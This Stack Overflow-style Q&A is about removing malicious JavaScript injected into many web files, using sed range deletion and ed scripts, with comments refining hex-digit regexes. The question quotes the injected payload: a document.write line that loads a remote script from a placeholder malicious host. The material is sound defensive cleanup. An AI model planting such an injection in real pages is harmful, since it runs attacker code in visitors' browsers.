How to delete multiple lines from a text file, including the matched line?

Question

I found some malicious JavaScript inserted into dozens of files.

The malicious code looks like this:

/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');

/*/123456*/

That is: some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag".

In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.

sed -i '/pattern to match/d' ./infile
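As a rough illustration, that single-line delete removes only the `document.write` line and leaves the surrounding marker comments behind. The sample lines below are made up to mimic the injected block, and the command is run on a pipe instead of with `-i` so nothing is modified:

```shell
# Hypothetical sample modeled on the injected block from the question.
sample=$(printf '%s\n' \
  '/*123456*/' \
  "document.write('<script src=\"http://maliciousurl.com/x\"></script>');" \
  '' \
  '/*/123456*/')

# /maliciousurl/d deletes only the lines that themselves match the pattern.
after=$(printf '%s\n' "$sample" | sed '/maliciousurl/d')
printf '%s\n' "$after"
```

The opening comment, the empty line and the closing comment all survive, which is why a single `/pattern/d` is not enough here.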

But I also need to delete the line before the match and the two lines after it, and, again, this is in at least a few dozen files.

So I think I could use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line along with the one before it and the two after it (4 lines total). Could the pattern to match be "\n*\nmaliciousurl\n\n*\n"?

I also tried this, hoping to replace the whole pattern with an empty string. The .* parts stand in for the hex numbers in the opening/closing tags and for the content between the tags.

sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

Jonathan Leffler · Answer 1 · 2014-04-15T03:08:17.397


You need to match on the begin and end comments, not the document.write line:

sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
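To see the range in action, here is a small sketch run against a made-up file (the file contents and the `sample.js` name are assumptions for illustration). Lines outside the range survive; everything from the opening marker through the closing marker, inclusive, is deleted:

```shell
# Work in a scratch directory so nothing real is touched.
dir=$(mktemp -d)
printf '%s\n' \
  'var x = 1;' \
  '/*123456*/' \
  "document.write('<script src=\"http://maliciousurl.com/x\"></script>');" \
  '' \
  '/*/123456*/' \
  'var y = 2;' > "$dir/sample.js"

# Address range: from the first line matching the opening comment through
# the next line matching the closing comment; d deletes every line in it.
cleaned=$(sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d' "$dir/sample.js")
printf '%s\n' "$cleaned"
rm -rf "$dir"
```

Only `var x = 1;` and `var y = 2;` are printed.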

This uses the % symbol in place of the more usual / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
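A quick way to check that the delimiter is only notation: both commands below select the same line, but the `/`-delimited one needs every slash in the comment escaped, while the `%` form does not. The test string is just the opening comment from the question.

```shell
line='/*123456*/'

# Conventional / delimiter: each literal slash must be written as \/.
slash=$(printf '%s\n' "$line" | sed -n '/\/\*123456\*\//p')

# \% makes % the delimiter, so the slashes can appear unescaped.
percent=$(printf '%s\n' "$line" | sed -n '\%/\*123456\*/%p')

printf '%s\n%s\n' "$slash" "$percent"
```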

From the sed manual on Mac OS X:

In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
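The same rule applies with `%` as the delimiter: in the sketch below, `\%` inside the address stands for a literal percent sign, so the regular expression is `50%` and only the first of the two made-up input lines is printed.

```shell
# The RE delimiter is %; the escaped \% is a literal percent sign,
# so the regular expression is 50% and only 'rate: 50%' matches.
matched=$(printf '%s\n' 'rate: 50%' 'rate: 50' | sed -n '\%50\%%p')
printf '%s\n' "$matched"
```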

Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):

ed - "$file" <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF

This does a global search for the malicious URL and, for each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then it writes the file and quits.
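To run that across many files, as the question suggests, one possible sketch is to let `grep -rl` list the infected files and feed each name to the same `ed` script. The function name `strip_payload` and its directory argument are hypothetical. The loop edits files in place, assumes file names contain no newlines, and assumes every match sits at least one line below the top of its file and has two lines after it (otherwise `.-1` or `.+2` is an invalid address and `ed` reports an error).

```shell
# Hypothetical helper: strip_payload DIR
# In every file under DIR that mentions maliciousurl.com, deletes each
# matching line plus the line before it and the two lines after it.
strip_payload() {
  grep -rl 'maliciousurl.com' "$1" | while IFS= read -r file; do
    # -s suppresses the byte counts ed normally prints; the answer's bare -
    # is the older spelling of the same option. The quoted here-document is
    # ed's stdin, so it does not consume the file names from the pipe.
    ed -s "$file" <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
  done
}
```

For example, `strip_payload ./public_html` would clean every matching file below that (hypothetical) directory; files that `grep` does not list are never opened.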

edited Apr 15 '14 at 03:08

answered Apr 15 '14 at 03:02

Jonathan Leffler


Your pattern starts with `\%`. Are you escaping the percent? Before I saw your answer, I tried something similar, using `~` as delimiter, and it did not work: `sed -i 's~/\**\*/*/\*/*\*/~~g' test.js` – Buttle Butkus Apr 15 '14 at 03:06
Also note that the malicious code seems to be added to the bottom of every file. And it is not always the same '123456'. In fact, I think they are hexadecimal digits. I've found some like this: "028b70" – Buttle Butkus Apr 15 '14 at 03:08
I tried your `sed -e` command, but I replaced '123456' with `*`. It seems to have removed the malicious closing tag, but nothing else. – Buttle Butkus Apr 15 '14 at 03:13
These details are important information; they materially affect the answer. I've addressed the `\%` notation with a quote from the manual. Your regex doesn't match things correctly. You might have been OK with `s~/\*.*\*/~~` to eliminate the before comments if nothing else in your file uses C-style comments. You need to distinguish between shell `*` globbing and regular expression `*` which means 0 or more of the preceding term in the regex. – Jonathan Leffler Apr 15 '14 at 03:14
ahhh I see. I can't just use `*` by itself. It has to be attached to something. Can I use `[hex]*` or something like that? – Buttle Butkus Apr 15 '14 at 03:16
Yes, you can use `[hex]*` to look for zero or more characters from the letters `h`, `e` and `x` in any sequence. If you want hex digits, then you need `[[:xdigit:]]*` (or if you want 1-4 of them, then (classically) `[[:xdigit:]]\{1,4\}`, or in modern versions with either `-E` (Mac OS X, BSD) or `-r` (GNU), `[[:xdigit:]]{1,4}`). – Jonathan Leffler Apr 15 '14 at 04:02
lol, you're funny. [hex]* is definitely not what I'm looking for. [[:xdigit:]] might be worth a try. I'm doing this on CentOS 6 by the way. I ended up cleaning up another 40 files manually with VIM. There are still other "infected" files on the server I can test this on, though. – Buttle Butkus Apr 15 '14 at 04:12
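Putting the comment thread together, a sketch that keys off the markers with any run of hex digits might look like the following. It assumes, as reported for these files, that each marker sits alone on its own line, which is why the patterns are anchored with `^` and `$`; a legitimate comment such as `/*face*/` alone on a line would still match, and if a closing marker is missing the range runs to the end of the file, so review the result. It writes to a temporary file and copies the result back instead of using `-i`, because `-i` takes different arguments on GNU and BSD/Mac OS X sed, and copying with `cat` keeps the original file's permissions. The function name `strip_hex_block` is hypothetical.

```shell
# Hypothetical helper: strip_hex_block FILE
# Deletes every block running from a line like /*028b70*/ through the
# next line like /*/028b70*/, inclusive, and rewrites FILE in place.
strip_hex_block() {
  tmp=$(mktemp) || return 1
  sed -e '\%^/\*[[:xdigit:]]\{1,\}\*/$%,\%^/\*/[[:xdigit:]]\{1,\}\*/$%d' "$1" > "$tmp" &&
    cat "$tmp" > "$1"
  status=$?
  rm -f "$tmp"
  return "$status"
}
```

Combined with the `grep -rl` loop idea from the question, this could be applied to each infected file in turn.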
